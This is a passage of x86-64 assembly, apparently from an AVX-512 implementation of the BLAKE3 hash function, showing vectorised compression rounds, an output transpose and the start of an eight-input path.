vpaddd zmm3, zmm3, zmm22
vpaddd zmm0, zmm0, zmm4
vpaddd zmm1, zmm1, zmm5
vpaddd zmm2, zmm2, zmm6
vpaddd zmm3, zmm3, zmm7
vpxord zmm12, zmm12, zmm0
vpxord zmm13, zmm13, zmm1
vpxord zmm14, zmm14, zmm2
vpxord zmm15, zmm15, zmm3
vprord zmm12, zmm12, 8
vprord zmm13, zmm13, 8
vprord zmm14, zmm14, 8
vprord zmm15, zmm15, 8
vpaddd zmm8, zmm8, zmm12
vpaddd zmm9, zmm9, zmm13
vpaddd zmm10, zmm10, zmm14
vpaddd zmm11, zmm11, zmm15
vpxord zmm4, zmm4, zmm8
vpxord zmm5, zmm5, zmm9
vpxord zmm6, zmm6, zmm10
vpxord zmm7, zmm7, zmm11
vprord zmm4, zmm4, 7
vprord zmm5, zmm5, 7
vprord zmm6, zmm6, 7
vprord zmm7, zmm7, 7
vpaddd zmm0, zmm0, zmm30
vpaddd zmm1, zmm1, zmm18
vpaddd zmm2, zmm2, zmm19
vpaddd zmm3, zmm3, zmm23
vpaddd zmm0, zmm0, zmm5
vpaddd zmm1, zmm1, zmm6
vpaddd zmm2, zmm2, zmm7
vpaddd zmm3, zmm3, zmm4
vpxord zmm15, zmm15, zmm0
vpxord zmm12, zmm12, zmm1
vpxord zmm13, zmm13, zmm2
vpxord zmm14, zmm14, zmm3
vprord zmm15, zmm15, 16
vprord zmm12, zmm12, 16
vprord zmm13, zmm13, 16
vprord zmm14, zmm14, 16
vpaddd zmm10, zmm10, zmm15
vpaddd zmm11, zmm11, zmm12
vpaddd zmm8, zmm8, zmm13
vpaddd zmm9, zmm9, zmm14
vpxord zmm5, zmm5, zmm10
vpxord zmm6, zmm6, zmm11
vpxord zmm7, zmm7, zmm8
vpxord zmm4, zmm4, zmm9
vprord zmm5, zmm5, 12
vprord zmm6, zmm6, 12
vprord zmm7, zmm7, 12
vprord zmm4, zmm4, 12
vpaddd zmm0, zmm0, zmm26
vpaddd zmm1, zmm1, zmm28
vpaddd zmm2, zmm2, zmm20
vpaddd zmm3, zmm3, zmm29
vpaddd zmm0, zmm0, zmm5
vpaddd zmm1, zmm1, zmm6
vpaddd zmm2, zmm2, zmm7
vpaddd zmm3, zmm3, zmm4
vpxord zmm15, zmm15, zmm0
vpxord zmm12, zmm12, zmm1
vpxord zmm13, zmm13, zmm2
vpxord zmm14, zmm14, zmm3
vprord zmm15, zmm15, 8
vprord zmm12, zmm12, 8
vprord zmm13, zmm13, 8
vprord zmm14, zmm14, 8
vpaddd zmm10, zmm10, zmm15
vpaddd zmm11, zmm11, zmm12
vpaddd zmm8, zmm8, zmm13
vpaddd zmm9, zmm9, zmm14
vpxord zmm5, zmm5, zmm10
vpxord zmm6, zmm6, zmm11
vpxord zmm7, zmm7, zmm8
vpxord zmm4, zmm4, zmm9
vprord zmm5, zmm5, 7
vprord zmm6, zmm6, 7
vprord zmm7, zmm7, 7
vprord zmm4, zmm4, 7
vpxord zmm0, zmm0, zmm8
vpxord zmm1, zmm1, zmm9
vpxord zmm2, zmm2, zmm10
vpxord zmm3, zmm3, zmm11
vpxord zmm4, zmm4, zmm12
vpxord zmm5, zmm5, zmm13
vpxord zmm6, zmm6, zmm14
vpxord zmm7, zmm7, zmm15
movzx eax, byte ptr [rbp+0x38]
jne 9b
mov rbx, qword ptr [rbp+0x50]
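# zmm0-zmm7 now hold the eight output state words for all 16 inputs in
# word-sliced form; the unpack/shuffle cascade below transposes them so
# that each input's 32-byte chaining value is contiguous before the
# eight 64-byte stores to the output buffer.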
vpunpckldq zmm16, zmm0, zmm1
vpunpckhdq zmm17, zmm0, zmm1
vpunpckldq zmm18, zmm2, zmm3
vpunpckhdq zmm19, zmm2, zmm3
vpunpckldq zmm20, zmm4, zmm5
vpunpckhdq zmm21, zmm4, zmm5
vpunpckldq zmm22, zmm6, zmm7
vpunpckhdq zmm23, zmm6, zmm7
vpunpcklqdq zmm0, zmm16, zmm18
vpunpckhqdq zmm1, zmm16, zmm18
vpunpcklqdq zmm2, zmm17, zmm19
vpunpckhqdq zmm3, zmm17, zmm19
vpunpcklqdq zmm4, zmm20, zmm22
vpunpckhqdq zmm5, zmm20, zmm22
vpunpcklqdq zmm6, zmm21, zmm23
vpunpckhqdq zmm7, zmm21, zmm23
vshufi32x4 zmm16, zmm0, zmm4, 0x88
vshufi32x4 zmm17, zmm1, zmm5, 0x88
vshufi32x4 zmm18, zmm2, zmm6, 0x88
vshufi32x4 zmm19, zmm3, zmm7, 0x88
vshufi32x4 zmm20, zmm0, zmm4, 0xDD
vshufi32x4 zmm21, zmm1, zmm5, 0xDD
vshufi32x4 zmm22, zmm2, zmm6, 0xDD
vshufi32x4 zmm23, zmm3, zmm7, 0xDD
vshufi32x4 zmm0, zmm16, zmm17, 0x88
vshufi32x4 zmm1, zmm18, zmm19, 0x88
vshufi32x4 zmm2, zmm20, zmm21, 0x88
vshufi32x4 zmm3, zmm22, zmm23, 0x88
vshufi32x4 zmm4, zmm16, zmm17, 0xDD
vshufi32x4 zmm5, zmm18, zmm19, 0xDD
vshufi32x4 zmm6, zmm20, zmm21, 0xDD
vshufi32x4 zmm7, zmm22, zmm23, 0xDD
vmovdqu32 zmmword ptr [rbx], zmm0
vmovdqu32 zmmword ptr [rbx+0x1*0x40], zmm1
vmovdqu32 zmmword ptr [rbx+0x2*0x40], zmm2
vmovdqu32 zmmword ptr [rbx+0x3*0x40], zmm3
vmovdqu32 zmmword ptr [rbx+0x4*0x40], zmm4
vmovdqu32 zmmword ptr [rbx+0x5*0x40], zmm5
vmovdqu32 zmmword ptr [rbx+0x6*0x40], zmm6
vmovdqu32 zmmword ptr [rbx+0x7*0x40], zmm7
vmovdqa32 zmm0, zmmword ptr [rsp]
vmovdqa32 zmm1, zmmword ptr [rsp+0x1*0x40]
vmovdqa32 zmm2, zmm0
vpaddd zmm2{k1}, zmm0, dword ptr [ADD16+rip] {1to16}
vpcmpltud k2, zmm2, zmm0
vpaddd zmm1 {k2}, zmm1, dword ptr [ADD1+rip] {1to16}
vmovdqa32 zmmword ptr [rsp], zmm2
vmovdqa32 zmmword ptr [rsp+0x1*0x40], zmm1
add rdi, 128
add rbx, 512
mov qword ptr [rbp+0x50], rbx
sub rsi, 16
cmp rsi, 16
jnc 2b
test rsi, rsi
jnz 3f
4:
vzeroupper
mov rsp, rbp
pop rbp
pop rbx
pop r12
pop r13
pop r14
pop r15
ret
.p2align 6
3:
test esi, 0x8
je 3f
vpbroadcastd ymm0, dword ptr [rcx]
vpbroadcastd ymm1, dword ptr [rcx+0x4]
vpbroadcastd ymm2, dword ptr [rcx+0x8]
vpbroadcastd ymm3, dword ptr [rcx+0xC]
vpbroadcastd ymm4, dword ptr [rcx+0x10]
vpbroadcastd ymm5, dword ptr [rcx+0x14]
vpbroadcastd ymm6, dword ptr [rcx+0x18]
vpbroadcastd ymm7, dword ptr [rcx+0x1C]
mov r8, qword ptr [rdi]
mov r9, qword ptr [rdi+0x8]
mov r10, qword ptr [rdi+0x10]
mov r11, qword ptr [rdi+0x18]
mov r12, qword ptr [rdi+0x20]
mov r13, qword ptr [rdi+0x28]
mov r14, qword ptr [rdi+0x30]
mov r15, qword ptr [rdi+0x38]
movzx eax, byte ptr [rbp+0x38]
movzx ebx, byte ptr [rbp+0x40]
or eax, ebx
xor edx, edx
2:
movzx ebx, byte ptr [rbp+0x48]
or ebx, eax
add rdx, 64
cmp rdx, qword ptr [rsp+0x80]
cmove eax, ebx
mov dword ptr [rsp+0x88], eax
vmovups xmm8, xmmword ptr [r8+rdx-0x40]
vinsertf128 ymm8, ymm8, xmmword ptr [r12+rdx-0x40], 0x01
vmovups xmm9, xmmword ptr [r9+rdx-0x40]
vinsertf128 ymm9, ymm9, xmmword ptr [r13+rdx-0x40], 0x01
vunpcklpd ymm12, ymm8, ymm9
vunpckhpd ymm13, ymm8, ymm9
vmovups xmm10, xmmword ptr [r10+rdx-0x40]
vinsertf128 ymm10, ymm10, xmmword ptr [r14+rdx-0x40], 0x01
vmovups xmm11, xmmword ptr [r11+rdx-0x40]
vinsertf128 ymm11, ymm11, xmmword ptr [r15+rdx-0x40], 0x01
vunpcklpd ymm14, ymm10, ymm11
vunpckhpd ymm15, ymm10, ymm11
vshufps ymm16, ymm12, ymm14, 136
vshufps ymm17, ymm12, ymm14, 221
vshufps ymm18, ymm13, ymm15, 136
vshufps ymm19, ymm13, ymm15, 221
vmovups xmm8, xmmword ptr [r8+rdx-0x30]
vinsertf128 ymm8, ymm8, xmmword ptr [r12+rdx-0x30], 0x01
vmovups xmm9, xmmword ptr [r9+rdx-0x30]
vinsertf128 ymm9, ymm9, xmmword ptr [r13+rdx-0x30], 0x01
vunpcklpd ymm12, ymm8, ymm9
vunpckhpd ymm13, ymm8, ymm9
vmovups xmm10, xmmword ptr [r10+rdx-0x30]
vinsertf128 ymm10, ymm10, xmmword ptr [r14+rdx-0x30], 0x01
vmovups xmm11, xmmword ptr [r11+rdx-0x30]
vinsertf128 ymm11, ymm11, xmmword ptr [r15+rdx-0x30], 0x01
vunpcklpd ymm14, ymm10, ymm11
vunpckhpd ymm15, ymm10, ymm11
vshufps ymm20, ymm12, ymm14, 136
vshufps ymm21, ymm12, ymm14, 221
vshufps ymm22, ymm13, ymm15, 136
vshufps ymm23, ymm13, ymm15, 221
vmovups xmm8, xmmword ptr [r8+rdx-0x20]
vinsertf128 ymm8, ymm8, xmmword ptr [r12+rdx-0x20], 0x01
vmovups xmm9, xmmword ptr [r9+rdx-0x20]
vinsertf128 ymm9, ymm9, xmmword ptr [r13+rdx-0x20], 0x01
vunpcklpd ymm12, ymm8, ymm9
vunpckhpd ymm13, ymm8, ymm9
vmovups xmm10, xmmword ptr [r10+rdx-0x20]
vinsertf128 ymm10, ymm10, xmmword ptr [r14+rdx-0x20], 0x01
vmovups xmm11, xmmword ptr [r11+rdx-0x20]
vinsertf128 ymm11, ymm11, xmmword ptr [r15+rdx-0x20], 0x01
vunpcklpd ymm14, ymm10, ymm11
vunpckhpd ymm15, ymm10, ymm11
vshufps ymm24, ymm12, ymm14, 136
vshufps ymm25, ymm12, ymm14, 221
vshufps ymm26, ymm13, ymm15, 136
vshufps ymm27, ymm13, ymm15, 221
vmovups xmm8, xmmword ptr [r8+rdx-0x10]
vinsertf128 ymm8, ymm8, xmmword ptr [r12+rdx-0x10], 0x01
vmovups xmm9, xmmword ptr [r9+rdx-0x10]
vinsertf128 ymm9, ymm9, xmmword ptr [r13+rdx-0x10], 0x01
vunpcklpd ymm12, ymm8, ymm9
vunpckhpd ymm13, ymm8, ymm9
vmovups xmm10, xmmword ptr [r10+rdx-0x10]
vinsertf128 ymm10, ymm10, xmmword ptr [r14+rdx-0x10], 0x01
vmovups xmm11, xmmword ptr [r11+rdx-0x10]
vinsertf128 ymm11, ymm11, xmmword ptr [r15+rdx-0x10], 0x01
vunpcklpd ymm14, ymm10, ymm11
vunpckhpd ymm15, ymm10, ymm11
vshufps ymm28, ymm12, ymm14, 136
vshufps ymm29, ymm12, ymm14, 221
vshufps ymm30, ymm13, ymm15, 136
vshufps ymm31, ymm13, ymm15, 221
vpbroadcastd ymm8, dword ptr [BLAKE3_IV_0+rip]
vpbroadcastd ymm9, dword ptr [BLAKE3_IV_1+rip]
vpbroadcastd ymm10, dword ptr [BLAKE3_IV_2+rip]
vpbroadcastd ymm11, dword ptr [BLAKE3_IV_3+rip]
vmovdqa ymm12, ymmword ptr [rsp]
vmovdqa ymm13, ymmword ptr [rsp+0x40]
vpbroadcastd ymm14, dword ptr [BLAKE3_BLOCK_LEN+rip]
vpbroadcastd ymm15, dword ptr [rsp+0x88]
vpaddd ymm0, ymm0, ymm16
vpaddd ymm1, ymm1, ymm18
vpaddd ymm2, ymm2, ymm20
vpaddd ymm3, ymm3, ymm22
vpaddd ymm0, ymm0, ymm4
vpaddd ymm1, ymm1, ymm5
vpaddd ymm2, ymm2, ymm6
vpaddd ymm3, ymm3, ymm7
vpxord ymm12, ymm12, ymm0
vpxord ymm13, ymm13, ymm1
vpxord ymm14, ymm14, ymm2
vpxord ymm15, ymm15, ymm3
vprord ymm12, ymm12, 16
vprord ymm13, ymm13, 16
vprord ymm14, ymm14, 16
vprord ymm15, ymm15, 16
vpaddd ymm8, ymm8, ymm12
vpaddd ymm9, ymm9, ymm13
vpaddd ymm10, ymm10, ymm14
vpaddd ymm11, ymm11, ymm15
vpxord ymm4, ymm4, ymm8
vpxord ymm5, ymm5, ymm9
vpxord ymm6, ymm6, ymm10
vpxord ymm7, ymm7, ymm11
vprord ymm4, ymm4, 12
vprord ymm5, ymm5, 12
vprord ymm6, ymm6, 12
vprord ymm7, ymm7, 12
vpaddd ymm0, ymm0, ymm17
vpaddd ymm1, ymm1, ymm19
vpaddd ymm2, ymm2, ymm21
vpaddd ymm3, ymm3, ymm23
vpaddd ymm0, ymm0, ymm4
vpaddd ymm1, ymm1, ymm5
vpaddd ymm2, ymm2, ymm6
vpaddd ymm3, ymm3, ymm7
vpxord ymm12, ymm12, ymm0
vpxord ymm13, ymm13, ymm1
vpxord ymm14, ymm14, ymm2
vpxord ymm15, ymm15, ymm3
vprord ymm12, ymm12, 8
vprord ymm13, ymm13, 8
vprord ymm14, ymm14, 8
vprord ymm15, ymm15, 8
vpaddd ymm8, ymm8, ymm12
vpaddd ymm9, ymm9, ymm13
vpaddd ymm10, ymm10, ymm14
vpaddd ymm11, ymm11, ymm15
vpxord ymm4, ymm4, ymm8
vpxord ymm5, ymm5, ymm9
vpxord ymm6, ymm6, ymm10
vpxord ymm7, ymm7, ymm11
vprord ymm4, ymm4, 7
vprord ymm5, ymm5, 7
vprord ymm6, ymm6, 7
vprord ymm7, ymm7, 7
vpaddd ymm0, ymm0, ymm24
vpaddd ymm1, ymm1, ymm26
vpaddd ymm2, ymm2, ymm28
vpaddd ymm3, ymm3, ymm30
vpaddd ymm0, ymm0, ymm5
vpaddd ymm1, ymm1, ymm6
vpaddd ymm2, ymm2, ymm7
vpaddd ymm3, ymm3, ymm4
vpxord ymm15, ymm15, ymm0
vpxord ymm12, ymm12, ymm1
vpxord ymm13, ymm13, ymm2
vpxord ymm14, ymm14, ymm3
vprord ymm15, ymm15, 16
vprord ymm12, ymm12, 16
vprord ymm13, ymm13, 16
vprord ymm14, ymm14, 16
vpaddd ymm10, ymm10, ymm15
vpaddd ymm11, ymm11, ymm12
vpaddd ymm8, ymm8, ymm13
vpaddd ymm9, ymm9, ymm14
vpxord ymm5, ymm5, ymm10
vpxord ymm6, ymm6, ymm11
vpxord ymm7, ymm7, ymm8
vpxord ymm4, ymm4, ymm9
vprord ymm5, ymm5, 12
vprord ymm6, ymm6, 12
vprord ymm7, ymm7, 12
vprord ymm4, ymm4, 12
vpaddd ymm0, ymm0, ymm25
vpaddd ymm1, ymm1, ymm27
vpaddd ymm2, ymm2, ymm29
vpaddd ymm3, ymm3, ymm31
vpaddd ymm0, ymm0, ymm5
vpaddd ymm1, ymm1, ymm6
vpaddd ymm2, ymm2, ymm7
vpaddd ymm3, ymm3, ymm4
vpxord ymm15, ymm15, ymm0
vpxord ymm12, ymm12, ymm1
vpxord ymm13, ymm13, ymm2
vpxord ymm14, ymm14, ymm3
vprord ymm15, ymm15, 8
vprord ymm12, ymm12, 8
vprord ymm13, ymm13, 8
vprord ymm14, ymm14, 8
vpaddd ymm10, ymm10, ymm15
vpaddd ymm11, ymm11, ymm12
vpaddd ymm8, ymm8, ymm13
vpaddd ymm9, ymm9, ymm14
vpxord ymm5, ymm5, ymm10
vpxord ymm6, ymm6, ymm11
vpxord ymm7, ymm7, ymm8
vpxord ymm4, ymm4, ymm9
vprord ymm5, ymm5, 7
vprord ymm6, ymm6, 7
vprord ymm7, ymm7, 7
vprord ymm4, ymm4, 7
vpaddd ymm0, ymm0, ymm18
vpaddd ymm1, ymm1, ymm19
vpaddd ymm2, ymm2, ymm23
vpaddd ymm3, ymm3, ymm20
vpaddd ymm0, ymm0, ymm4
vpaddd ymm1, ymm1, ymm5
vpaddd ymm2, ymm2, ymm6
vpaddd ymm3, ymm3, ymm7
vpxord ymm12, ymm12, ymm0
vpxord ymm13, ymm13, ymm1
vpxord ymm14, ymm14, ymm2
vpxord ymm15, ymm15, ymm3
vprord ymm12, ymm12, 16
vprord ymm13, ymm13, 16
vprord ymm14, ymm14, 16
vprord ymm15, ymm15, 16
vpaddd ymm8, ymm8, ymm12
vpaddd ymm9, ymm9, ymm13
vpaddd ymm10, ymm10, ymm14
vpaddd ymm11, ymm11, ymm15
vpxord ymm4, ymm4, ymm8
vpxord ymm5, ymm5, ymm9
vpxord ymm6, ymm6, ymm10
vpxord ymm7, ymm7, ymm11
vprord ymm4, ymm4, 12
vprord ymm5, ymm5, 12
vprord ymm6, ymm6, 12
vprord ymm7, ymm7, 12
vpaddd ymm0, ymm0, ymm22
vpaddd ymm1, ymm1, ymm26
vpaddd ymm2, ymm2, ymm16
vpaddd ymm3, ymm3, ymm29
vpaddd ymm0, ymm0, ymm4
vpaddd ymm1, ymm1, ymm5
vpaddd ymm2, ymm2, ymm6
vpaddd ymm3, ymm3, ymm7
vpxord ymm12, ymm12, ymm0
vpxord ymm13, ymm13, ymm1
vpxord ymm14, ymm14, ymm2
vpxord ymm15, ymm15, ymm3
vprord ymm12, ymm12, 8
vprord ymm13, ymm13, 8
vprord ymm14, ymm14, 8
vprord ymm15, ymm15, 8
vpaddd ymm8, ymm8, ymm12
vpaddd ymm9, ymm9, ymm13
vpaddd ymm10, ymm10, ymm14
vpaddd ymm11, ymm11, ymm15
vpxord ymm4, ymm4, ymm8
vpxord ymm5, ymm5, ymm9
vpxord ymm6, ymm6, ymm10
vpxord ymm7, ymm7, ymm11
vprord ymm4, ymm4, 7
vprord ymm5, ymm5, 7
vprord ymm6, ymm6, 7
vprord ymm7, ymm7, 7
vpaddd ymm0, ymm0, ymm17
vpaddd ymm1, ymm1, ymm28
vpaddd ymm2, ymm2, ymm25
vpaddd ymm3, ymm3, ymm31
vpaddd ymm0, ymm0, ymm5
vpaddd ymm1, ymm1, ymm6
vpaddd ymm2, ymm2, ymm7
vpaddd ymm3, ymm3, ymm4
vpxord ymm15, ymm15, ymm0
vpxord ymm12, ymm12, ymm1
vpxord ymm13, ymm13, ymm2
vpxord ymm14, ymm14, ymm3
vprord ymm15, ymm15, 16
vprord ymm12, ymm12, 16
vprord ymm13, ymm13, 16
vprord ymm14, ymm14, 16
vpaddd ymm10, ymm10, ymm15
vpaddd ymm11, ymm11, ymm12
vpaddd ymm8, ymm8, ymm13
vpaddd ymm9, ymm9, ymm14
vpxord ymm5, ymm5, ymm10
vpxord ymm6, ymm6, ymm11
vpxord ymm7, ymm7, ymm8
vpxord ymm4, ymm4, ymm9
vprord ymm5, ymm5, 12
vprord ymm6, ymm6, 12
vprord ymm7, ymm7, 12
vprord ymm4, ymm4, 12
vpaddd ymm0, ymm0, ymm27
vpaddd ymm1, ymm1, ymm21
vpaddd ymm2, ymm2, ymm30
vpaddd ymm3, ymm3, ymm24
vpaddd ymm0, ymm0, ymm5
vpaddd ymm1, ymm1, ymm6
vpaddd ymm2, ymm2, ymm7
vpaddd ymm3, ymm3, ymm4
vpxord ymm15, ymm15, ymm0
vpxord ymm12, ymm12, ymm1
vpxord ymm13, ymm13, ymm2
vpxord ymm14, ymm14, ymm3
vprord ymm15, ymm15, 8
vprord ymm12, ymm12, 8
vprord ymm13, ymm13, 8
vprord ymm14, ymm14, 8
vpaddd ymm10, ymm10, ymm15
vpaddd ymm11, ymm11, ymm12
vpaddd ymm8, ymm8, ymm13
vpaddd ymm9, ymm9, ymm14
vpxord ymm5, ymm5, ymm10
vpxord ymm6, ymm6, ymm11
vpxord ymm7, ymm7, ymm8
vpxord ymm4, ymm4, ymm9
vprord ymm5, ymm5, 7
vprord ymm6, ymm6, 7
vprord ymm7, ymm7, 7
vprord ymm4, ymm4, 7
vpaddd ymm0, ymm0, ymm19
vpaddd ymm1, ymm1, ymm26
vpaddd ymm2, ymm2, ymm29
vpaddd ymm3, ymm3, ymm23
vpaddd ymm0, ymm0, ymm4
vpaddd ymm1, ymm1, ymm5
vpaddd ymm2, ymm2, ymm6
vpaddd ymm3, ymm3, ymm7
vpxord ymm12, ymm12, ymm0
vpxord ymm13, ymm13, ymm1
vpxord ymm14, ymm14, ymm2
vpxord ymm15, ymm15, ymm3
vprord ymm12, ymm12, 16
vprord ymm13, ymm13, 16
vprord ymm14, ymm14, 16
vprord ymm15, ymm15, 16
vpaddd ymm8, ymm8, ymm12
vpaddd ymm9, ymm9, ymm13
vpaddd ymm10, ymm10, ymm14
vpaddd ymm11, ymm11, ymm15
vpxord ymm4, ymm4, ymm8
vpxord ymm5, ymm5, ymm9
vpxord ymm6, ymm6, ymm10
vpxord ymm7, ymm7, ymm11
vprord ymm4, ymm4, 12
vprord ymm5, ymm5, 12
vprord ymm6, ymm6, 12
vprord ymm7, ymm7, 12
vpaddd ymm0, ymm0, ymm20
vpaddd ymm1, ymm1, ymm28
vpaddd ymm2, ymm2, ymm18
vpaddd ymm3, ymm3, ymm30
vpaddd ymm0, ymm0, ymm4
vpaddd ymm1, ymm1, ymm5
vpaddd ymm2, ymm2, ymm6
vpaddd ymm3, ymm3, ymm7
vpxord ymm12, ymm12, ymm0
vpxord ymm13, ymm13, ymm1
vpxord ymm14, ymm14, ymm2
vpxord ymm15, ymm15, ymm3
vprord ymm12, ymm12, 8
vprord ymm13, ymm13, 8
vprord ymm14, ymm14, 8
vprord ymm15, ymm15, 8
vpaddd ymm8, ymm8, ymm12
vpaddd ymm9, ymm9, ymm13
vpaddd ymm10, ymm10, ymm14
vpaddd ymm11, ymm11, ymm15
vpxord ymm4, ymm4, ymm8
vpxord ymm5, ymm5, ymm9
vpxord ymm6, ymm6, ymm10
vpxord ymm7, ymm7, ymm11
vprord ymm4, ymm4, 7
vprord ymm5, ymm5, 7
vprord ymm6, ymm6, 7
vprord ymm7, ymm7, 7
vpaddd ymm0, ymm0, ymm22
vpaddd ymm1, ymm1, ymm25
vpaddd ymm2, ymm2, ymm27
vpaddd ymm3, ymm3, ymm24
vpaddd ymm0, ymm0, ymm5
vpaddd ymm1, ymm1, ymm6
vpaddd ymm2, ymm2, ymm7
vpaddd ymm3, ymm3, ymm4
vpxord ymm15, ymm15, ymm0
vpxord ymm12, ymm12, ymm1
vpxord ymm13, ymm13, ymm2
vpxord ymm14, ymm14, ymm3
vprord ymm15, ymm15, 16
vprord ymm12, ymm12, 16
vprord ymm13, ymm13, 16
vprord ymm14, ymm14, 16
vpaddd ymm10, ymm10, ymm15
vpaddd ymm11, ymm11, ymm12
vpaddd ymm8, ymm8, ymm13
vpaddd ymm9, ymm9, ymm14
vpxord ymm5, ymm5, ymm10
vpxord ymm6, ymm6, ymm11
vpxord ymm7, ymm7, ymm8
vpxord ymm4, ymm4, ymm9
vprord ymm5, ymm5, 12
vprord ymm6, ymm6, 12
vprord ymm7, ymm7, 12
vprord ymm4, ymm4, 12
vpaddd ymm0, ymm0, ymm21
vpaddd ymm1, ymm1, ymm16
vpaddd ymm2, ymm2, ymm31
vpaddd ymm3, ymm3, ymm17
vpaddd ymm0, ymm0, ymm5
vpaddd ymm1, ymm1, ymm6
vpaddd ymm2, ymm2, ymm7
vpaddd ymm3, ymm3, ymm4
vpxord ymm15, ymm15, ymm0
vpxord ymm12, ymm12, ymm1
vpxord ymm13, ymm13, ymm2
vpxord ymm14, ymm14, ymm3
vprord ymm15, ymm15, 8
vprord ymm12, ymm12, 8
vprord ymm13, ymm13, 8
vprord ymm14, ymm14, 8
vpaddd ymm10, ymm10, ymm15
vpaddd ymm11, ymm11, ymm12
vpaddd ymm8, ymm8, ymm13
vpaddd ymm9, ymm9, ymm14
vpxord ymm5, ymm5, ymm10
vpxord ymm6, ymm6, ymm11
vpxord ymm7, ymm7, ymm8
vpxord ymm4, ymm4, ymm9
vprord ymm5, ymm5, 7
vprord ymm6, ymm6, 7
vprord ymm7, ymm7, 7
vprord ymm4, ymm4, 7
vpaddd ymm0, ymm0, ymm26
vpaddd ymm1, ymm1, ymm28
vpaddd ymm2, ymm2, ymm30
vpaddd ymm3, ymm3, ymm29
vpaddd ymm0, ymm0, ymm4
vpaddd ymm1, ymm1, ymm5
vpaddd ymm2, ymm2, ymm6
vpaddd ymm3, ymm3, ymm7
vpxord ymm12, ymm12, ymm0
vpxord ymm13, ymm13, ymm1
vpxord ymm14, ymm14, ymm2
vpxord ymm15, ymm15, ymm3
vprord ymm12, ymm12, 16
vprord ymm13, ymm13, 16
vprord ymm14, ymm14, 16
vprord ymm15, ymm15, 16
vpaddd ymm8, ymm8, ymm12
vpaddd ymm9, ymm9, ymm13
vpaddd ymm10, ymm10, ymm14
vpaddd ymm11, ymm11, ymm15
vpxord ymm4, ymm4, ymm8
vpxord ymm5, ymm5, ymm9
vpxord ymm6, ymm6, ymm10
vpxord ymm7, ymm7, ymm11
vprord ymm4, ymm4, 12
vprord ymm5, ymm5, 12
vprord ymm6, ymm6, 12
vprord ymm7, ymm7, 12
vpaddd ymm0, ymm0, ymm23
vpaddd ymm1, ymm1, ymm25
vpaddd ymm2, ymm2, ymm19
vpaddd ymm3, ymm3, ymm31
vpaddd ymm0, ymm0, ymm4
vpaddd ymm1, ymm1, ymm5
vpaddd ymm2, ymm2, ymm6
vpaddd ymm3, ymm3, ymm7
vpxord ymm12, ymm12, ymm0
vpxord ymm13, ymm13, ymm1
vpxord ymm14, ymm14, ymm2
vpxord ymm15, ymm15, ymm3
vprord ymm12, ymm12, 8
vprord ymm13, ymm13, 8
vprord ymm14, ymm14, 8
vprord ymm15, ymm15, 8
vpaddd ymm8, ymm8, ymm12
vpaddd ymm9, ymm9, ymm13
vpaddd ymm10, ymm10, ymm14
vpaddd ymm11, ymm11, ymm15
vpxord ymm4, ymm4, ymm8
vpxord ymm5, ymm5, ymm9
vpxord ymm6, ymm6, ymm10
vpxord ymm7, ymm7, ymm11
vprord ymm4, ymm4, 7
vprord ymm5, ymm5, 7
vprord ymm6, ymm6, 7
vprord ymm7, ymm7, 7
vpaddd ymm0, ymm0, ymm20
vpaddd ymm1, ymm1, ymm27
vpaddd ymm2, ymm2, ymm21
vpaddd ymm3, ymm3, ymm17
vpaddd ymm0, ymm0, ymm5
vpaddd ymm1, ymm1, ymm6
vpaddd ymm2, ymm2, ymm7
vpaddd ymm3, ymm3, ymm4
vpxord ymm15, ymm15, ymm0
vpxord ymm12, ymm12, ymm1
vpxord ymm13, ymm13, ymm2
vpxord ymm14, ymm14, ymm3
vprord ymm15, ymm15, 16
vprord ymm12, ymm12, 16
vprord ymm13, ymm13, 16
vprord ymm14, ymm14, 16
vpaddd ymm10, ymm10, ymm15
vpaddd ymm11, ymm11, ymm12
vpaddd ymm8, ymm8, ymm13
vpaddd ymm9, ymm9, ymm14
vpxord ymm5, ymm5, ymm10
vpxord ymm6, ymm6, ymm11
vpxord ymm7, ymm7, ymm8
vpxord ymm4, ymm4, ymm9
vprord ymm5, ymm5, 12
vprord ymm6, ymm6, 12
vprord ymm7, ymm7, 12
vprord ymm4, ymm4, 12
vpaddd ymm0, ymm0, ymm16
vpaddd ymm1, ymm1, ymm18
vpaddd ymm2, ymm2, ymm24
vpaddd ymm3, ymm3, ymm22
vpaddd ymm0, ymm0, ymm5
vpaddd ymm1, ymm1, ymm6
vpaddd ymm2, ymm2, ymm7
vpaddd ymm3, ymm3, ymm4
vpxord ymm15, ymm15, ymm0
vpxord ymm12, ymm12, ymm1
vpxord ymm13, ymm13, ymm2
vpxord ymm14, ymm14, ymm3
vprord ymm15, ymm15, 8
vprord ymm12, ymm12, 8
vprord ymm13, ymm13, 8
vprord ymm14, ymm14, 8
vpaddd ymm10, ymm10, ymm15
vpaddd ymm11, ymm11, ymm12
vpaddd ymm8, ymm8, ymm13
vpaddd ymm9, ymm9, ymm14
vpxord ymm5, ymm5, ymm10
vpxord ymm6, ymm6, ymm11
vpxord ymm7, ymm7, ymm8
vpxord ymm4, ymm4, ymm9
vprord ymm5, ymm5, 7
vprord ymm6, ymm6, 7
vprord ymm7, ymm7, 7
vprord ymm4, ymm4, 7
vpaddd ymm0, ymm0, ymm28
vpaddd ymm1, ymm1, ymm25
vpaddd ymm2, ymm2, ymm31
vpaddd ymm3, ymm3, ymm30
vpaddd ymm0, ymm0, ymm4
vpaddd ymm1, ymm1, ymm5
vpaddd ymm2, ymm2, ymm6
vpaddd ymm3, ymm3, ymm7
vpxord ymm12, ymm12, ymm0
vpxord ymm13, ymm13, ymm1
vpxord ymm14, ymm14, ymm2
vpxord ymm15, ymm15, ymm3
vprord ymm12, ymm12, 16
vprord ymm13, ymm13, 16
vprord ymm14, ymm14, 16
vprord ymm15, ymm15, 16
vpaddd ymm8, ymm8, ymm12
vpaddd ymm9, ymm9, ymm13
vpaddd ymm10, ymm10, ymm14
vpaddd ymm11, ymm11, ymm15
vpxord ymm4, ymm4, ymm8
vpxord ymm5, ymm5, ymm9
vpxord ymm6, ymm6, ymm10
vpxord ymm7, ymm7, ymm11
vprord ymm4, ymm4, 12
vprord ymm5, ymm5, 12
vprord ymm6, ymm6, 12
vprord ymm7, ymm7, 12
vpaddd ymm0, ymm0, ymm29
vpaddd ymm1, ymm1, ymm27
vpaddd ymm2, ymm2, ymm26
vpaddd ymm3, ymm3, ymm24
vpaddd ymm0, ymm0, ymm4
vpaddd ymm1, ymm1, ymm5
vpaddd ymm2, ymm2, ymm6
vpaddd ymm3, ymm3, ymm7
vpxord ymm12, ymm12, ymm0
vpxord ymm13, ymm13, ymm1
vpxord ymm14, ymm14, ymm2
vpxord ymm15, ymm15, ymm3
vprord ymm12, ymm12, 8
vprord ymm13, ymm13, 8
